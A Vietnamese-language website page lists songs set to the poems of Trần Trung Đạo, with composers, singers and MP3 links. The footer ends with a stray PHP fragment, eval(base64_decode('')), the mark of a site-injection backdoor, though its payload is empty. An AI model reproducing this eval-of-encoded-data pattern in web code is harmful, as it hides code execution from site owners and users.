Nhạc MP3

Thơ Trần Trung Đạo do các nhạc sĩ, nghệ sĩ thân hữu hiện đang ở nước ngoài cũng như từ trong nước phổ. Một số anh chị đã không tiện xử dụng bút hiệu quen thuộc của mình vì nhiều lý do. Tác giả chân thành cám ơn và xin giới thiệu đến độc giả bốn phương.

Đổi Cả Thiên Thu Tiếng Mẹ Cười
Nhạc Võ Tá Hân, ca sĩ Bảo Yến

Thơ

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/dctttmc.mp3]

Bà Mẹ Điên
Nhạc Vĩnh Điện, tác giả trình bày

Thơ

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/bamedien-vinhdien.mp3]

Vĩnh Biệt Em, Thu Cúc
Nhạc Mai Đằng, ca sĩ Ánh Nguyệt

Thơ Youtube

Đổi Cả Thiên Thu Tiếng Mẹ Cười
Nhạc Võ Tá Hân, ca sĩ Thanh Thúy

MP3 [audio:http://www.trantrungdao.com/amthanh/DoiCaThienThuTiengMeCuoi-ThanhThuy.mp3]

Đổi Cả Thiên Thu Tiếng Mẹ Cười
Nhạc Võ Tá Hân, ca sĩ Gia Huy

Youtube Youtube
Đổi Cả Thiên Thu Tiếng Mẹ Cười
Nhạc Đặng Vương Quân, ca sĩ Phương Dung (VN)
 
Nhạc MP3 [audio:http://www.trantrungdao.com/amthanh/doicathienthutiengmecuoi1.mp3]
Đổi Cả Thiên Thu Tiếng Mẹ Cười
Nhạc Tùng Nguyên, ca sĩ Phong Thu (VN)
 
Nhạc MP3 [audio:http://www.trantrungdao.com/amnhac/DoicathienthutiengMecuoi_PhongThu.mp3]
Đổi Cả Thiên Thu Tiếng Mẹ Cười
Nhạc Nguyễn Hải, ca sĩ Hà Lan Phương
 
MP3 [audio:http://www.trantrungdao.com/amthanh/me-doicathienthutiengmecuoi.mp3]
Đổi Cả Thiên Thu Tiếng Mẹ Cười
Nhạc Mai Đức Vinh, ca sĩ Nguyễn Dung
 
MP3 [audio:http://www.trantrungdao.com/amthanh/DoiCaThienThu.mp3]
Đổi Cả Thiên Thu Tiếng Mẹ Cười
Nhạc Lê Vinh
 
MP3
Đổi Cả Thiên Thu Tiếng Mẹ Cười
Nhạc Trần Cao Thăng
 
MP3
Chiều Cuối Năm Nhớ Bạn
Nhạc Nguyên Chương, tác giả trình bày
 
MP3 [audio:http://www.trantrungdao.com/audio/AiVeBenAyThamQue-NguyenChuong.mp3]
Đừng Trở Lại
Nhạc Nguyên Chương, tác giả trình bày
 
MP3 [audio:http://www.trantrungdao.com/audio/DungTroLai-NguyenChuong.mp3]
Đêm Ngồi Nghe Tiếng Chim Trên Biển
Nhạc Nguyên Chương, tác giả trình bày
 
MP3 [audio:http://www.trantrungdao.com/audio/DemNgoiNgheTiengChimQuaBien-NguyenChuong.mp3]
Lời Quê Hương
Nhạc Nguyên Chương, tác giả trình bày
 
MP3 [audio:http://www.trantrungdao.com/audio/LoiQueHuong-NguyenChuong.mp3]

Mỗi Mùa Xuân Về
Nhạc Nhật Ngân, ca sĩ Thanh Thúy
 
Thơ

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/MoiMuaXuanVe-ThanhThuy.mp3]
Mỗi Mùa Xuân Về
Nhạc Nhật Ngân, tác giả trình bày
 

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/moimuaxuanve.mp3]
Mỗi Mùa Xuân Về
Nhạc Nhật Ngân, Trần Trung Đạo trình bày
 
Thơ

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/MoiMuaXuanVe-TTD.mp3]

Em Bé Việt Nam và Viên Sỏi
Nhạc Phan Văn Hưng, tác giả trình bày
 
Thơ

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/embevnvaviensoi.mp3]
Em Bé Việt Nam và Viên Sỏi
Nhạc Đoàn Công Long, tác giả trình bày
 
MP3 [audio:http://www.trantrungdao.com/amthanh/EmBeVaVienSoi_AnhLong.mp3]

Hương Đàm
Nhạc Nghiêm Phú Phát, ca sĩ Hồng Vân
 

Thơ

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/HuongDam1.mp3]
Thầy Đã Đi Rồi
Nhạc Nghiêm Phú Phát, ca sĩ Hồng Vân
 

Thơ

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/ThayDaDiRoi.mp3]

Chiều San Francisco
Nhạc Nguyễn Hải, ca sĩ Hà Lan Phương
 
MP3 [audio:http://www.trantrungdao.com/amthanh/ThaoThuc-HLP.mp3]

Xuân Đất Khách
Nhạc Nguyễn Hải, ca sĩ Hà Lan Phương
 
Thơ

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/XuanDatKhach-HLP.mp3]
Xuân Đất Khách
Nhạc Mai Đức Vinh, ca sĩ Ngọc Tâm
 
Thơ

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/xuandatkhach.mp3]

Xin Đừng Bỏ Rơi Tôi
Nhạc Phan Ni Tấn, ca sĩ Nguyễn Hải
 
Thơ

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/loiquehuong.mp3]
Xin Đừng Bỏ Rơi Tôi
Nhạc Phan Ni Tấn, ca sĩ Đoan Nguyên
 
Thơ

Nhạc

MP3 [audio:http://www.nguoivietboston.com/amthanh/XinDungBoRoiToi-Toronto.mp3]
Xin Đừng Bỏ Rơi Tôi
Nhạc Phan Ni Tấn, ca sĩ Đoàn Ngãi
 
MP3 [audio: http://www.trantrungdao.com/amthanh/LoiQueHuong.mp3]
Một Lần Thơ Về Thăm
Nhạc Phan Ni Tấn, ca sĩ Nguyễn Hải
 
Thơ

Nhạc

MP3 [audio: http://www.trantrungdao.com/amthanh/MotLanThoVeTham.mp3]
Một Lần Thơ Về Thăm
Nhạc Phan Ni Tấn, ca sĩ Hoàng Đức
 
[audio:http://www.nguoivietboston.com/amthanh/MotLanThoVeTham-Toronto.mp3]
Một Lần Thơ Về Thăm
Nhạc Phan Ni Tấn, Trần Trung Đạo trình bày
 
Thơ

Nhạc

MP3 [audio: http://www.nguoivietboston.com/audio/motlanthovetham-ttd.mp3]
Chết Như Người Việt NamNhạc Phan Ni Tấn, tác giả trình bày Thơ

Nhạc

MP3 [audio: http://www.trantrungdao.com/amthanh/ChetNhuNguoiVietNam-PNT.mp3]
Cho Tôi Xin
Đinh Quang Trung phố và hát
 
[audio: http://www.trantrungdao.com/amthanh/chotoixin.mp3]
Cho Tôi Xin
Đinh Quang Trung phổ, Trần Trung Đạo hát
 
[audio: http://www.trantrungdao.com/amthanh/chotoixin2.mp3]
Người Con Gái Việt Nam Trên Đại Lộ Sri AyutthayaNhạc Phan Ni Tấn, ca sĩ Điền Nguyên Thơ

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/NguoiConGaiVN-Ayutthaya.mp3]
Người Con Gái Việt Nam Trên Đại Lộ Sri Ayutthaya
Phan Ni Tấn phổ & hát
 
Thơ

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/nguoicongaivn-pnt.mp3]
Người Con Gái Việt Nam Trên Đại Lộ Sri AyutthayaNhạc Nguyễn Tuấn, ca sĩ Kim Mai MP3 [audio: http://www.trantrungdao.com/amthanh/nguoicongaivietnam.mp3]

Hơi Thở Việt Nam
Nhạc Mã Đình Sơn, ca sĩ Thúy Anh
 
Thơ

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/hoithovietnam.mp3]

Bức Tranh Sông Núi
Nhạc Mã Đình Sơn, ca sĩ Thúy Anh
 
Thơ

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/BucTranhSongNui.mp3]

Mẹ Là Thơ Đất Nước Sẽ Hồi Sinh
Nhạc Nguyễn Hải, ca sĩ Hà Lan Phương
 
Thơ

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/melathohlp.mp3]
Người Con Gái Trên Đường Bolsa
Nhạc Trầm Tử Thiêng, ca sĩ Anh Dũng
Thơ

Nhạc

MP3 [audio: http://www.trantrungdao.com/amthanh/bolsa.mp3]
Người Con Gái Trên Đường Bolsa
Nhạc Nguyễn Hoàng,ca sĩ Hoàng Hoa

Nhạc

MP3 [audio: http://www.trantrungdao.com/amthanh/NguoiemgaitrenduongBolsa-NguyenHoang.mp3]
Tôi Vẫn Đợi
Nhạc Hoàng Thi, ca sĩ Kim Loan
 
Thơ

Nhạc

MP3 [audio: http://www.trantrungdao.com/amthanh/toivandoi.mp3]
Nếu Mai Mốt Tôi Về
Nhạc Nguyễn Hữu Tân, tác giả trình bày
 
Thơ

Nhạc

MP3 [audio: http://www.trantrungdao.com/amthanh/HuuTan-NeuMaiMotToiVe.mp3]
Nếu Mai Mốt Tôi Về
Nhạc Nguyễn Hữu Tân, Trần Trung Đạo trình bày
 
Thơ

Nhạc

MP3 [audio: http://www.trantrungdao.com/amthanh/NhanRaToiKhong.mp3]
Lời Người Ở Lại
Nhạc Phan Ni Tấn, ca sĩ Vân Trang
 
Thơ

Nhạc

MP3 [audio:http://www.nguoivietboston.com/amthanh/LoiNguoiOLai-VanTrang.mp3]
Chết Như Người Việt Nam
Nhạc Phan Ni Tấn, ca sĩ Vân Trang
 
Thơ

Nhạc

MP3
Người Lính Già Vừa Chết Đêm Qua
Nhạc Phan Ni Tấn, ca sĩ Duy Hùng
 
Thơ

Nhạc

MP3 [audio:http://www.nguoivietboston.com/amthanh/NguoiLinhGiaVuaChetDemQua-Toronto.mp3]
Người Lính Già Vừa Chết Đêm Qua
Nhạc Nguyễn Văn Thành, tác giả trình bày
 

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/NguoiLinhGiaVuaMoiChetDemQua.mp3]
Người Lính Già Vừa Chết Đêm Qua
Nhạc Đổ Kim Bảng
 
Người Lính Già Vừa Chết Đêm Qua
Nhạc Tùng Nguyên, tác giả trình bày
 

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/NguoiLinhGia-TungNguyen.mp3]

Hạt Cát Trường Sa
Nhạc Phan Ni Tấn, tốp ca
 
Thơ

Nhạc

MP3
Hạt Cát Trường SaNhạc Nguyễn Văn Thành, tác giả trình bày 

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/HatCatTruongSa-NguyenVanThanh.mp3]
Hoàng Sa Trường Sa
Nhạc Phù Chí Phát
 

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/HoangSaTruongSa-PCP.mp3]
Hạt Cát Trường Sa
Nhạc Hoàng Hoa do tác giả trình bày
 

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/HatCatTruongSa-HoangHoa.mp3]
Người Hành Khất Việt NamNhạc Hồ Hải, tác giả trình bày  Thơ

Nhạc

MP3
Người Hành Khất Việt NamNhạc Đổ Quân, tác giả trình bày 

Nhạc

MP3 [audio:http://www.dosite.net/songs/hanhkhatvn.mp3]
Tôi Sẽ Về
Nhạc Phan Ni Tấn
 

Nhạc

MP3
Tôi Sẽ Về
Nhạc Đặng Vương Quân
 

Nhạc

MP3
Tôi Vẫn Nợ Em Một Lời Xin Lỗi
Nhạc Nguyễn Văn Thành tác giả trình bày
 
Thơ

Nhạc

MP3
Đừng Trở Lại
Nhạc Phạm Anh Dũng, tác giả trình bày
 
Thơ

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/DungTroLai-PhamAnhDung.mp3]
Buổi Sáng Qua Đồi
Nhạc Hoàng Hoa, tác giả trình bày
 
Thơ

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/BuoiSangQuaDoi-HoangHoa.mp3]
Mưa
Nhạc Hoàng Hoa tác giả trình bày
 
Thơ

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/Mua-HoangHoa.mp3]
Mưa
Nhạc Nguyễn Văn Thành tác giả trình bày
 
Thơ

Nhạc

MP3 [audio:http://www.trantrungdao.com/audio/Mua-NguyenVanThanh.mp3]
Bao Giờ Nhỉ Tôi Về Thăm Xứ Quảng
Nhạc Tùng Nguyên, tác giả trình bày
 
Thơ

Nhạc

MP3 [audio:http://www.trantrungdao.com/amthanh/baogionhi.mp3]

Leave a Reply

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>